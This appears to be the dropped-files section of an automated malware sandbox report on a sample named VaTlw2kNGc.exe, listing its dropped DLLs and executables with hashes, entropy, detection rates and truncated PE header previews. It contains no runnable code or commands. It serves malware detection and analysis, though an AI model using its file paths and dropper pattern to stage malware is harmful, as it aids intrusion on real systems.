                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..b?..b?..b?......b?..>..b?..:..b?..;..b?..<..b?.2.>..b?..>..b?.7.>..b?..b>.pb?.2.2..b?.2.?..b?.2....b?.2.=..b?.Rich.b?.........PE..d.....,d.........." .....P...........<....................................................`............................................P...0............................/......T....k..T............................k..8............`.. ............................text....N.......P.................. ..`.rdata..4P...`...R...T..............@..@.data...H...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................
                                                                                                  Process:C:\ProgramData\Microsoft\hacn.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):158488
                                                                                                  Entropy (8bit):6.8491143497239655
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:j0k3SXjD9aWpAn3rb7SbuDlvNgS4fWqEznfo9mNoFTSlXZ8Ax5ILZ1GIxq:j0kiXjD9v8X7Euk4wYOFTafxn
                                                                                                  MD5:7447EFD8D71E8A1929BE0FAC722B42DC
                                                                                                  SHA1:6080C1B84C2DCBF03DCC2D95306615FF5FCE49A6
                                                                                                  SHA-256:60793C8592193CFBD00FD3E5263BE4315D650BA4F9E4FDA9C45A10642FD998BE
                                                                                                  SHA-512:C6295D45ED6C4F7534C1A38D47DDC55FEA8B9F62BBDC0743E4D22E8AD0484984F8AB077B73E683D0A92D11BF6588A1AE395456CFA57DA94BB2A6C4A1B07984DE
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........l.M...M...M...D..I.......O.......F.......E.......N.......N.......O...M...(.......w.......L.......L.......L...RichM...................PE..d...&.,d.........." .....`..........p3...............................................4....`.............................................L.......x....`.......@.......<.../...p..D...H{..T............................{..8............p...............................text....^.......`.................. ..`.rdata.......p.......d..............@..@.data........0......................@....pdata.......@......................@..@.rsrc........`.......0..............@..@.reloc..D....p.......:..............@..B........................................................................................................................................................................................................................................
                                                                                                  Process:C:\ProgramData\Microsoft\hacn.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):79128
                                                                                                  Entropy (8bit):6.284790077237953
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:ZmtvsXhgzrojAs9/s+S+pGLypbyxk/DDTBVILLwX7SyiPx9:c56OzyAs9/sT+pGLypb+k/XFVILLwX4f
                                                                                                  MD5:819166054FEC07EFCD1062F13C2147EE
                                                                                                  SHA1:93868EBCD6E013FDA9CD96D8065A1D70A66A2A26
                                                                                                  SHA-256:E6DEB751039CD5424A139708475CE83F9C042D43E650765A716CB4A924B07E4F
                                                                                                  SHA-512:DA3A440C94CB99B8AF7D2BC8F8F0631AE9C112BD04BADF200EDBF7EA0C48D012843B4A9FB9F1E6D3A9674FD3D4EB6F0FA78FD1121FAD1F01F3B981028538B666
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~...:...:...:...3.i.<...h...8...h...6...h...2...h...9.......8...:.......q...=.......;.......;.......;.......;...Rich:...........PE..d.....,d.........." .....l...........%.......................................P............`.............................................P............0....... ..<......../...@..........T..............................8............................................text...fj.......l.................. ..`.rdata..Ts.......t...p..............@..@.data...............................@....pdata..<.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................
                                                                                                  Process:C:\ProgramData\Microsoft\hacn.exe
                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                  Category:dropped
                                                                                                  Size (bytes):880569
                                                                                                  Entropy (8bit):5.682993312079324
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:cgYJu4KXWyBC6S4IEa8A4a2YWD3dOVwx/fpEWertSLMN+:cgYJiVBFLa2VIVwx/fpEWe+MN+
                                                                                                  MD5:C4989BCEB9E7E83078812C9532BAEEA7
                                                                                                  SHA1:AAFB66EBDB5EDC327D7CB6632EB80742BE1AD2EB
                                                                                                  SHA-256:A0F5C7F0BAC1EA9DC86D60D20F903CC42CFF3F21737426D69D47909FC28B6DCD
                                                                                                  SHA-512:FB6D431D0F2C8543AF8DF242337797F981D108755712EC6C134D451AA777D377DF085B4046970CC5AC0991922DDF1F37445A51BE1A63EF46B0D80841222FB671
                                                                                                  Malicious:false
                                                                                                  Preview:PK..........!..,..5...5......._collections_abc.pyco....................................@.......d.Z.d.d.l.m.Z.m.Z...d.d.l.Z.e.e.e.....Z.e.d...Z.d.d...Z.e.e...Z.[.g.d...Z.d.Z.e.e.d.....Z.e.e.e.......Z.e.e.i.........Z.e.e.i.........Z.e.e.i.........Z.e.e.g.....Z.e.e.e.g.......Z.e.e.e.d.......Z.e.e.e.d.d.>.......Z.e.e.e.......Z.e.e.d.....Z e.e.d.....Z!e.e.e"......Z#e.i.......Z$e.i.......Z%e.i.......Z&e.e.j'..Z(e.d.d.......Z)d.d...Z*e*..Z*e.e*..Z+e*.,....[*d.d...Z-e-..Z-e.e-..Z.[-d.d...Z/G.d.d...d.e.d...Z0G.d.d...d.e.d...Z1G.d.d...d.e1..Z2e2.3e+....G.d.d...d.e.d...Z4G.d.d ..d e4..Z5G.d!d"..d"e5..Z6e6.3e.....G.d#d$..d$e.d...Z7G.d%d&..d&e7..Z8e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e ....e8.3e!....e8.3e#....G.d'd(..d(e7..Z9G.d)d*..d*e8..Z:e:.3e)....G.d+d,..d,e.d...Z;G.d-d...d.e.d...Z<G.d/d0..d0e;e7e<..Z=G.d1d2..d2e...Z>d3d4..Z?d5d6..Z@d7d8..ZAG.d9d:..d:e.d...ZBG.d;d<..d<e=..ZCeC.3eD....G.d=d>..d>eC..ZEeE.3e.....G.d?d@..d@e=..ZFeF
                                                                                                  Process:C:\ProgramData\Microsoft\hacn.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3450648
                                                                                                  Entropy (8bit):6.098075450035195
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:98304:YP+uemAdn67xfxw6rKsK1CPwDv3uFfJz1CmiX:OZemAYxfxw6HK1CPwDv3uFfJzUmA
                                                                                                  MD5:9D7A0C99256C50AFD5B0560BA2548930
                                                                                                  SHA1:76BD9F13597A46F5283AA35C30B53C21976D0824
                                                                                                  SHA-256:9B7B4A0AD212095A8C2E35C71694D8A1764CD72A829E8E17C8AFE3A55F147939
                                                                                                  SHA-512:CB39AA99B9D98C735FDACF1C5ED68A4D09D11F30262B91F6AA48C3F8520EFF95E499400D0CE7E280CA7A90FF6D7141D2D893EF0B33A8803A1CADB28BA9A9E3E2
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........].q...q...q....M..q.......q.......q.......q.......q...q..[q.......q.......q.......s.......q....!..q.......q..Rich.q..........................PE..d......c.........." ..."..$.................................................. 5......%5...`.........................................../..h...Z4.@.....4.|.....2......x4../....4..O....-.8.............................-.@............P4..............................text.....$.......$................. ..`.rdata..&.....%.......$.............@..@.data...!z....2..,....1.............@....pdata........2.......2.............@..@.idata..^#...P4..$....3.............@..@.00cfg..u.....4.......3.............@..@.rsrc...|.....4.......3.............@..@.reloc...y....4..z....3.............@..B................................................................................................................................................
                                                                                                  Process:C:\ProgramData\Microsoft\hacn.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4458776
                                                                                                  Entropy (8bit):6.460390021076921
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:49152:myrXfGIy+Bqk5c5Ad2nwZT3Q6wsV136cR2DZvbK30xLNZcAgVBvcpYcvl1IDWbH3:Uw5tVBlicWdvoDkHUMF7Ph/qe
                                                                                                  MD5:63A1FA9259A35EAEAC04174CECB90048
                                                                                                  SHA1:0DC0C91BCD6F69B80DCDD7E4020365DD7853885A
                                                                                                  SHA-256:14B06796F288BC6599E458FB23A944AB0C843E9868058F02A91D4606533505ED
                                                                                                  SHA-512:896CAA053F48B1E4102E0F41A7D13D932A746EEA69A894AE564EF5A84EF50890514DECA6496E915AAE40A500955220DBC1B1016FE0B8BCDDE0AD81B2917DEA8B
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]...<...<...<...I...<...Sc..<...I...<...I...<...I...<...D...<...D...<...<...=..+I../<..+I...<..+Ia..<..+I...<..Rich.<..........................PE..d.....,d.........." .....V#..v!...............................................E.....".D...`.........................................`.<.....@.=.|.....D......`B.......C../....D..t....$.T...........................P.$.8............p#.8............................text...bT#......V#................. ..`.rdata...B...p#..D...Z#.............@..@.data... .....=.......=.............@....pdata.......`B......HA.............@..@PyRuntim`....pD......VC.............@....rsrc.........D......ZC.............@..@.reloc...t....D..v...dC.............@..B........................................................................................................................................................................................
                                                                                                  Process:C:\ProgramData\Microsoft\hacn.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):6361390
                                                                                                  Entropy (8bit):7.989449982411625
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:196608:S8JwSNEMZM/LUuL/VLdu4IDrrp9ECJqIrE:S4jEMeIqd6DrrDLJNE
                                                                                                  MD5:E5DB23B3AAF4DDDD2BAF96FB7BBA9616
                                                                                                  SHA1:B4479AB38BB534CE5BBF9C6F3C89305BDCFF2CF7
                                                                                                  SHA-256:93BDF29408BE9CF5C1880F897F91CD475824E46B929CD947F32B8808A5903958
                                                                                                  SHA-512:541436C704D8789DAD962841B985EB84C251F5FAC7AD93DD318BC91A2C29885947F8D35AC99C03B3C3D6EC81D03AD25E01F85406F8F86BF05BD2D30244CE51DB
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I.>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I.=>...I..=>..Rich<>..........PE..L..... b............................0........0....@..........................`............@.........................p...4.......P....@..P....................0..<#......T............................U..@............0..x....... ....................text............................... ..`.rdata.......0....... ..............@..@.data... G..........................@....didat.......0......................@....rsrc...P....@......................@..@.reloc..<#...0...$..................@..B................................................................................................................................................................................................................................................
                                                                                                  Process:C:\ProgramData\Microsoft\hacn.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):29976
                                                                                                  Entropy (8bit):6.627859470728624
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:gUC2hwhVHqOmEVILQG35YiSyvrYPxWEl6:FC2ehVKOmEVILQGp7SyEPxe
                                                                                                  MD5:A653F35D05D2F6DEBC5D34DADDD3DFA1
                                                                                                  SHA1:1A2CEEC28EA44388F412420425665C3781AF2435
                                                                                                  SHA-256:DB85F2F94D4994283E1055057372594538AE11020389D966E45607413851D9E9
                                                                                                  SHA-512:5AEDE99C3BE25B1A962261B183AE7A7FB92CB0CB866065DC9CD7BB5FF6F41CC8813D2CC9DE54670A27B3AD07A33B833EAA95A5B46DAD7763CA97DFA0C1CE54C9
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........!.F.O.F.O.F.O.O...D.O...N.D.O...J.M.O...K.N.O...L.B.O...N.D.O.F.N...O...N.C.O...B.G.O...O.G.O....G.O...M.G.O.RichF.O.................PE..d.....,d.........." .........0......................................................;\....`.........................................`@..L....@..x....p.......`.......F.../......H....2..T............................2..8............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......4..............@....pdata.......`.......6..............@..@.rsrc........p.......:..............@..@.reloc..H............D..............@..B........................................................................................................................................................................................................................................
                                                                                                  Process:C:\ProgramData\Microsoft\hacn.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1123608
                                                                                                  Entropy (8bit):5.3853088605790385
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:6mwlRMmuZ63NTQCb5Pfhnzr0ql8L8kcM7IRG5eeme6VZyrIBHdQLhfFE+uQfk:ulRuUZV0m8UMMREtV6Vo4uYQfk
                                                                                                  MD5:81D62AD36CBDDB4E57A91018F3C0816E
                                                                                                  SHA1:FE4A4FC35DF240B50DB22B35824E4826059A807B
                                                                                                  SHA-256:1FB2D66C056F69E8BBDD8C6C910E72697874DAE680264F8FB4B4DF19AF98AA2E
                                                                                                  SHA-512:7D15D741378E671591356DFAAD4E1E03D3F5456CBDF87579B61D02A4A52AB9B6ECBFFAD3274CEDE8C876EA19EAEB8BA4372AD5986744D430A29F50B9CAFFB75D
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........$z.eJ).eJ).eJ)...).eJ)..K(.eJ)..O(.eJ)..N(.eJ)..I(.eJ)|.K(.eJ)..K(.eJ).eK).eJ)|.G(.eJ)|.J(.eJ)|..).eJ)|.H(.eJ)Rich.eJ)........................PE..d.....,d.........." .....B.......... *.......................................@......Q.....`.............................................X............ ..........H......../...0.......`..T........................... a..8............`..x............................text...9A.......B.................. ..`.rdata.......`.......F..............@..@.data...............................@....pdata..H...........................@..@.rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\Desktop\VaTlw2kNGc.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):17830453
                                                                                                  Entropy (8bit):7.99838673729773
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:393216:ToNLbkNj0zztkKxXziCnbvCyHPSh5NzQSRAgS+aCBtd:TohLzht3nZHY59RRAP0d
                                                                                                  MD5:4FEC8FAF6590F62034AD44A54175B9E9
                                                                                                  SHA1:D7F0D639D943AEEE3F98442EEC744CA0E78A07D1
                                                                                                  SHA-256:68231C9B195A3987BC26BB9AF2543F49A04C1343BBB17982BC6302A21138E33A
                                                                                                  SHA-512:A6307FB6CED7699C4743235CBE31A8B3673F3D9FC2421AC455ECE7C3C0990A15AEFB20A78120D0FF62752B7E3D922056EE0212A13B85144C73B24507F9678B19
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 75%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W..6..6..6....V.6....T.'6....U.6..)MZ.6..)M..6..)M..6..)M..6..N$.6..N4.6..6..7..'M..6..'M..6..'MX.6..'M..6..Rich.6..................PE..L......e...............!.F..........P........`....@.......................................@.............................4.......P.......D....................p..\%......T...............................@............`..x....... ....................text....E.......F.................. ..`.rdata.......`.......J..............@..@.data...XG... ......................@....didat.......p......................@....rsrc...D...........................@..@.reloc..\%...p...&..................@..B........................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\Desktop\VaTlw2kNGc.exe
                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):98224
                                                                                                  Entropy (8bit):6.452201564717313
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:ywqHLG4SsAzAvadZw+1Hcx8uIYNUzUoHA4decbK/zJNuw6z5U:ytrfZ+jPYNzoHA4decbK/FNu51U
                                                                                                  MD5:F34EB034AA4A9735218686590CBA2E8B
                                                                                                  SHA1:2BC20ACDCB201676B77A66FA7EC6B53FA2644713
                                                                                                  SHA-256:9D2B40F0395CC5D1B4D5EA17B84970C29971D448C37104676DB577586D4AD1B1
                                                                                                  SHA-512:D27D5E65E8206BD7923CF2A3C4384FEC0FC59E8BC29E25F8C03D039F3741C01D1A8C82979D7B88C10B209DB31FBBEC23909E976B3EE593DC33481F0050A445AF
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..qn.."n.."n.."...#l.."g.."e.."n.."B.."<..#c.."<..#~.."<..#q.."<..#o.."<.g"o.."<..#o.."Richn.."................PE..d...%|.a.........." .........`......p................................................{....`A.........................................B..4....J...............p..X....X...'..........h,..T............................,..8............................................text............................... ..`.rdata...@.......B..................@..@.data...@....`.......@..............@....pdata..X....p.......D..............@..@_RDATA...............P..............@..@.rsrc................R..............@..@.reloc...............V..............@..B........................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\Desktop\VaTlw2kNGc.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):46064
                                                                                                  Entropy (8bit):7.796865894568779
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:V3CnjEFEHH57WfWzAPpIe7zOsupVPW9zxtrXhcwKnXffpI3IvtVHeDYiSyv6RqeA:V6jEFO7WffITsMw9vrxcpnPq3IvtVHs9
                                                                                                  MD5:C24B301F99A05305AC06C35F7F50307F
                                                                                                  SHA1:0CEE6DE0EA38A4C8C02BF92644DB17E8FAA7093B
                                                                                                  SHA-256:C665F60B1663544FACF9A026F5A87C8445558D7794BAFF56E42E65671D5ADC24
                                                                                                  SHA-512:936D16FEA3569A32A9941D58263E951623F4927A853C01EE187364DF95CD246B3826E7B8423AC3C265965EE8E491275E908AC9E2D63F3ABC5F721ADD8E20F699
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........>..m..m..m..=m..m...l..m..Sm..m...l..m...l..m...l..mf..l..mt..l..m..m..mf..l..mf..l..mf.Qm..mf..l..mRich..m........................PE..d....(.b.........." .................b....................................................`..........................................{..H....y.......p....... ..,............{.......................................n..8...........................................UPX0....................................UPX1................................@....rsrc........p......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                  Process:C:\Users\user\Desktop\VaTlw2kNGc.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):105456
                                                                                                  Entropy (8bit):7.934837610567248
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:oLDiGfp+9JSNhsyzp72hnyE8E24ZllDUD1RPC/J3KPKu8URMIv5q5pM7SyqL:owcV0nyE32kvDUhRa1uHqIv5q5pMsL
                                                                                                  MD5:604154D16E9A3020B9AD3B6312F5479C
                                                                                                  SHA1:27C874B052D5E7F4182A4EAD6B0486E3D0FAF4DA
                                                                                                  SHA-256:3C7585E75FA1E8604D8C408F77995B30F90C54A0F2FF5021E14FA7F84E093FB6
                                                                                                  SHA-512:37CE86FD8165FC51EBE568D7CE4B5EA8C1598114558D9F74A748A07DC62A1CC5D50FE1448DDE6496EA13E45631E231221C15A64CEBBB18FA96E2F71C61BE0DB4
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........8...V...V...V......V..W...V..S...V..R...V..U...V.a.W...V.s.W...V...W.;.V.a.U...V.a.[...V.a.V...V.a.....V.a.T...V.Rich..V.........PE..d...q(.b.........." .....p................................................... ............`.............................................P........................'......................................................8...........................................UPX0....................................UPX1.....p.......f..................@....rsrc................j..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                  Process:C:\Users\user\Desktop\VaTlw2kNGc.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):33264
                                                                                                  Entropy (8bit):7.645283646866556
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:rzmfA5r8DJk6cG5pq+Iv5IiyYiSyvUqbIteE+K:rzmG8DJkV+Iv5Iiy7Syif
                                                                                                  MD5:8BA5202E2F3FB1274747AA2AE7C3F7BF
                                                                                                  SHA1:8D7DBA77A6413338EF84F0C4DDF929B727342C16
                                                                                                  SHA-256:0541A0028619AB827F961A994667F9A8F1A48C8B315F071242A69D1BD6AEAB8B
                                                                                                  SHA-512:D19322A1ABA0DA1AA68E24315CDBB10D63A5E3021B364B14974407DC3D25CD23DF4FF1875B12339FD4613E0F3DA9E5A78F1A0E54FFD8360ED764AF20C3ECBB49
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........SQ..2?..2?..2?..J...2?.G>..2?.G:..2?.G;..2?.G<..2?.+G>..2?.9@>..2?.jK>..2?..2>.l2?.+G2..2?.+G?..2?.+G...2?.+G=..2?.Rich.2?.........PE..d....(.b.........." .....P..........p/.......................................P............`..........................................K..P....I.......@.......................K......................................p;..8...........................................UPX0....................................UPX1.....P.......N..................@....rsrc........@.......R..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                  Process:C:\Users\user\Desktop\VaTlw2kNGc.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):84976
                                                                                                  Entropy (8bit):7.919746609337062
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:fZ6by758mldpnwpd+cjwZaO4jA5e0RBcS8iGyfo0Dm8wIve1M77Syi7:v7HdSpd+co4AhRiXT0DiIve1M7c7
                                                                                                  MD5:215ACC93E63FB03742911F785F8DE71A
                                                                                                  SHA1:D4E3B46DB5D4FCDD4F6B6874B060B32A4B676BF9
                                                                                                  SHA-256:FFDBE11C55010D33867317C0DC2D1BD69F8C07BDA0EA0D3841B54D4A04328F63
                                                                                                  SHA-512:9223A33E8235C566D280A169F52C819A83C3E6FA1F4B8127DDE6D4A1B7E940DF824CCAF8C0000EAC089091FDE6AE89F0322FE62E47328F07EA92C7705ACE4A72
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........l.C...C...C...J..G.......A.......H.......K.......@......@......A...C...&......y......B......B......B...RichC...........................PE..d....(.b.........." ..... ................................................................`.........................................4...L....................@..........................................................8...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                  Process:C:\Users\user\Desktop\VaTlw2kNGc.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):40944
                                                                                                  Entropy (8bit):7.702142071966167
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:5p4KUJsCditRTP+g7X1eloezpnmhclAka9TdTsGW9Vm0NpDrZIvQwHmAYiSyveDd:5pghditRD+gReloMpnmaydTjWfbrZIvY
                                                                                                  MD5:1F7E5E111207BC4439799EBF115E09ED
                                                                                                  SHA1:E8B643F19135C121E77774EF064C14A3A529DCA3
                                                                                                  SHA-256:179EBBE9FD241F89DF31D881D9F76358D82CEDEE1A8FB40215C630F94EB37C04
                                                                                                  SHA-512:7F8A767B3E17920ACFAAFD4A7ED19B22862D8DF5BDF4B50E0D53DFBF32E9F2A08F5CDE97ACECB8ABF8F10FBBEDB46C1D3A0B9EB168D11766246AFE9E23ADA6FD
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Rv...............ok.....Db......Db......Db......Db.......b...............e.......b.......b.......b.......b......Rich............PE..d....(.b.........." .....p...........k....................................................`.............................................P.......h............ ..<...........X........................................w..8...........................................UPX0....................................UPX1.....p.......j..................@....rsrc................n..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                  Process:C:\Users\user\Desktop\VaTlw2kNGc.exe
                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                  Category:dropped
                                                                                                  Size (bytes):879899
                                                                                                  Entropy (8bit):5.683242093964832
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:EEHYKmIBWSxC6SacYgCA4a2Y80dqVwxffpEo4pJSLMNmQ:EEHYI1x1La2jpVwxffpEo40MNmQ
                                                                                                  MD5:D9A88C1228ECC6BDEE15AB1D8250B9F1
                                                                                                  SHA1:DD8F8DDE1AB2E05AEBCE3CB0B99C0B380AA3592C
                                                                                                  SHA-256:9DB062EEFFE2028281730237AAFD9401C7AAD3ECC781905E9539F1FF41114989
                                                                                                  SHA-512:FA8189705E42AD08CE50225F4545A1FF8D24BCF2E026F2F66B1CABE8FF697F5DEEDBA31A8C93E5D6988AACC78A3CDD5F29D383E34F821EFADACFAD3299E0E408
                                                                                                  Malicious:false
                                                                                                  Preview:PK..........!..0.............._collections_abc.pyco....................................@.......d.Z.d.d.l.m.Z.m.Z...d.d.l.Z.e.e.e.....Z.e.d...Z.d.d...Z.e.e...Z.[.g.d...Z.d.Z.e.e.d.....Z.e.e.e.......Z.e.e.i.........Z.e.e.i.........Z.e.e.i.........Z.e.e.g.....Z.e.e.e.g.......Z.e.e.e.d.......Z.e.e.e.d.d.>.......Z.e.e.e.......Z.e.e.d.....Z e.e.d.....Z!e.e.e"......Z#e.i.......Z$e.i.......Z%e.i.......Z&e.e.j'..Z(e.d.d.......Z)d.d...Z*e*..Z*e.e*..Z+e*.,....[*d.d...Z-e-..Z-e.e-..Z.[-d.d...Z/G.d.d...d.e.d...Z0G.d.d...d.e.d...Z1G.d.d...d.e1..Z2e2.3e+....G.d.d...d.e.d...Z4G.d.d ..d e4..Z5G.d!d"..d"e5..Z6e6.3e.....G.d#d$..d$e.d...Z7G.d%d&..d&e7..Z8e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e ....e8.3e!....e8.3e#....G.d'd(..d(e7..Z9G.d)d*..d*e8..Z:e:.3e)....G.d+d,..d,e.d...Z;G.d-d...d.e.d...Z<G.d/d0..d0e;e7e<..Z=G.d1d2..d2e...Z>d3d4..Z?d5d6..Z@d7d8..ZAG.d9d:..d:e.d...ZBG.d;d<..d<e=..ZCeC.3eD....G.d=d>..d>eC..ZEeE.3e.....G.d?d@..d@e=..ZFeF
                                                                                                  Process:C:\Users\user\Desktop\VaTlw2kNGc.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1105816
                                                                                                  Entropy (8bit):7.937977313955466
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24576:Uk3UseOkUaIS1Ufk9yI9EBrXvkKTfropEOdo89kASpQY32Za1CPwDv3uFfJW:Uk3U0aIS1Uc9yoEZlTfMpE9lT1CPwDvX
                                                                                                  MD5:3CC020BACEAC3B73366002445731705A
                                                                                                  SHA1:6D332AB68DCA5C4094ED2EE3C91F8503D9522AC1
                                                                                                  SHA-256:D1AA265861D23A9B76F16906940D30F3A65C5D0597107ECB3D2E6D470B401BB8
                                                                                                  SHA-512:1D9B46D0331ED5B95DDA8734ABE3C0BD6F7FB1EC9A3269FEAB618D661A1644A0DC3BF8AC91778D5E45406D185965898FE87ABD3261A6F7F2968C43515A48562C
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........R.m.R.m.R.m.[...@.m.0.l.P.m.0.h.^.m.0.i.Z.m.0.n.V.m.R.l..m..l.Y.m...n.O.m...i.+.m...m.S.m....S.m...o.S.m.RichR.m.........................PE..d...`.0b.........." ..............&.`D5...&..................................p7...........`......................................... h5......c5.h....`5......p2.8............h7.....................................xP5.@...........................................UPX0......&.............................UPX1..........&.....................@....rsrc........`5.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                  Process:C:\Users\user\Desktop\VaTlw2kNGc.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1507312
                                                                                                  Entropy (8bit):7.992414868541998
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:24576:crd6K1Bo1WfBpYjgE47pPsk1mEbFz9S/s/owvzjN1Qf4xsb+hnj3NhpRodki1X:dK1OWfBpYjjopXtBzY/s/oohjsbenj3w
                                                                                                  MD5:B93EDA8CC111A5BDE906505224B717C3
